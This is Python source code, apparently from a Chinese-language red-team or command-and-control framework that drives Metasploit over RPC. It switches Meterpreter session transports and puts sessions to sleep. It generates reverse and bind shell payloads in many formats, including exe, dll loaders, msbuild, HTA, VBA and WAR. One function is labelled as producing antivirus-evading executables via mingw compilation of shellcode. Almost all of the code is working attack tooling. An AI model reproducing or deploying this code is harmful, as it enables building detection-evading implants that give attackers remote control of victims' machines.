def update(sessionid=None, action=None, sleep=0): if sessionid is None or sessionid <= 0: context = data_return(306, TRANSPORT_MSG.get(306), {}) return context if action == "next": result_flag = RpcClient.call( Method.SessionMeterpreterTransportNext, [sessionid]) elif action == "prev": result_flag = RpcClient.call( Method.SessionMeterpreterTransportPrev, [sessionid]) elif action == "sleep": result_flag = RpcClient.call( Method.SessionMeterpreterTransportSleep, [sessionid, sleep]) if result_flag: reconnect_time = time.time() + sleep Notice.send_warn( f'切换Session到休眠 SID:{sessionid} 重连时间: {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reconnect_time))}' ) context = data_return(203, TRANSPORT_MSG.get(203), {}) return context else: context = data_return(305, TRANSPORT_MSG.get(305), []) return context else: result_flag = False if result_flag: Notice.send_info(f"切换传输完成 SID:{sessionid}") context = data_return(202, TRANSPORT_MSG.get(202), {}) return context else: context = data_return(302, TRANSPORT_MSG.get(302), []) return context
def generate_bypass_exe(mname=None, opts=None): "生成免杀的exe" # 处理RHOST及LHOST参数 if mname.find("reverse") > 0: try: opts.pop('RHOST') except Exception as _: pass elif mname.find("bind") > 0: try: opts.pop('LHOST') except Exception as _: pass # 处理OverrideRequestHost参数 if opts.get('OverrideRequestHost') is True: opts["LHOST"] = opts['OverrideLHOST'] opts["LPORT"] = opts['OverrideLPORT'] opts['OverrideRequestHost'] = False Notice.send_warn("Payload包含OverrideRequestHost参数") Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}") Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}") # EXTENSIONS参数 if "meterpreter_" in mname and opts.get('EXTENSIONS') is True: opts['EXTENSIONS'] = 'stdapi' opts["Format"] = "hex" result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: return None shellcode = base64.b64decode(result.get('payload')) byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode) return byteresult
def generate_shellcode(mname=None, opts=None): """根据配置生成shellcode""" # 处理RHOST及LHOST参数 if mname.find("reverse") > 0: try: opts.pop('RHOST') except Exception as _: pass elif mname.find("bind") > 0: try: opts.pop('LHOST') except Exception as _: pass # 处理OverrideRequestHost参数 if opts.get('OverrideRequestHost') is True: opts["LHOST"] = opts['OverrideLHOST'] opts["LPORT"] = opts['OverrideLPORT'] Notice.send_warn("Payload包含OverrideRequestHost参数") Notice.send_warn( f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}") Notice.send_warn( f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}") # EXTENSIONS参数 if "meterpreter_" in mname and opts.get('EXTENSIONS') is True: opts['EXTENSIONS'] = 'stdapi' opts["Format"] = 'raw' if "windows" in mname: opts["Format"] = 'raw' elif "linux" in mname: opts["Format"] = 'raw' elif "java" in mname: opts["Format"] = 'jar' elif "python" in mname: opts["Format"] = 'py' elif "php" in mname: opts["Format"] = 'raw' result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: return result byteresult = base64.b64decode(result.get('payload')) return byteresult
def create(mname=None, opts=None): """生成payload文件""" # badchars = opts['BadChars'] | | '' # fmt = opts['Format'] | | 'raw' # force = opts['ForceEncode'] | | false # template = opts['Template'] | | nil # plat = opts['Platform'] | | nil # keep = opts['KeepTemplateWorking'] | | false # force = opts['ForceEncode'] | | false # sled_size = opts['NopSledSize'].to_i | | 0 # iter = opts['Iterations'].to_i | | 0 # 清理历史文件 Payload._destroy_old_files() # 处理RHOST及LHOST参数 if mname.find("reverse") > 0: try: opts.pop('RHOST') except Exception as _: pass elif mname.find("bind") > 0: try: opts.pop('LHOST') except Exception as _: pass # 处理OverrideRequestHost参数 if opts.get('OverrideRequestHost') is True: opts["LHOST"] = opts['OverrideLHOST'] opts["LPORT"] = opts['OverrideLPORT'] opts['OverrideRequestHost'] = False Notice.send_warn("Payload包含OverrideRequestHost参数") Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}") Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}") # EXTENSIONS参数 if "meterpreter_" in mname and opts.get('EXTENSIONS') is True: opts['EXTENSIONS'] = 'stdapi' if opts.get("Format") == "AUTO": if "windows" in mname: opts["Format"] = 'exe-src' elif "linux" in mname: opts["Format"] = 'elf' elif "java" in mname: opts["Format"] = 'jar' elif "python" in mname: opts["Format"] = 'py' elif "php" in mname: opts["Format"] = 'raw' else: context = data_return(306, Payload_MSG.get(306), {}) return context if opts.get("Format") in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]: # 生成原始payload tmp_type = opts.get("Format") opts["Format"] = "hex" result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: context = data_return(305, Payload_MSG.get(305), {}) return context byteresult = base64.b64decode(result.get('payload')) filename = Payload._create_payload_with_loader(mname, byteresult, payload_type=tmp_type) # 读取新的zip文件内容 payloadfile = os.path.join(File.tmp_dir(), filename) if opts.get("HandlerName") is not None: filename = f"{opts.get('HandlerName')}_{filename}" byteresult = open(payloadfile, 'rb') elif opts.get("Format") == "msbuild": # 生成原始payload opts["Format"] = "csharp" result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: context = data_return(305, Payload_MSG.get(305), {}) return context byteresult = base64.b64decode(result.get('payload')) filename = Payload._create_payload_use_msbuild(mname, byteresult) # 读取新的zip文件内容 payloadfile = os.path.join(File.tmp_dir(), filename) byteresult = open(payloadfile, 'rb') elif opts.get("Format") == "exe-src": opts["Format"] = "hex" result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: context = data_return(305, Payload_MSG.get(305), {}) return context byteresult = base64.b64decode(result.get('payload')) byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult) filename = "{}.exe".format(int(time.time())) elif opts.get("Format") == "exe-src-service": opts["Format"] = "hex" result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: context = data_return(305, Payload_MSG.get(305), {}) return context byteresult = base64.b64decode(result.get('payload')) # result为None会抛异常 byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult, payload_type="REVERSE_HEX_AS_SERVICE") filename = "{}.exe".format(int(time.time())) else: file_suffix = { "c": "c", "csharp": "cs", "exe": "exe", "exe-service": "exe", "powershell": "ps1", "psh-reflection": "ps1", "psh-cmd": "ps1", "hex": "hex", "hta-psh": "hta", "raw": "raw", "vba": "vba", "vbscript": "vbs", "elf": None, "elf-so": "so", "jar": "jar", "java": "java", "war": "war", "python": "py", "py": "py", "python-reflection": "py", } result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: context = data_return(305, Payload_MSG.get(305), {}) return context byteresult = base64.b64decode(result.get('payload')) if file_suffix.get(opts.get("Format")) is None: filename = "{}".format(int(time.time())) else: filename = "{}.{}".format(int(time.time()), file_suffix.get(opts.get("Format"))) response = HttpResponse(byteresult) response['Content-Type'] = 'application/octet-stream' response['Code'] = 200 response['Message'] = parse.quote(Payload_MSG.get(201)) # 中文特殊处理 urlpart = parse.quote(os.path.splitext(filename)[0], 'utf-8') leftpart = os.path.splitext(filename)[-1] response['Content-Disposition'] = f"{urlpart}{leftpart}" return response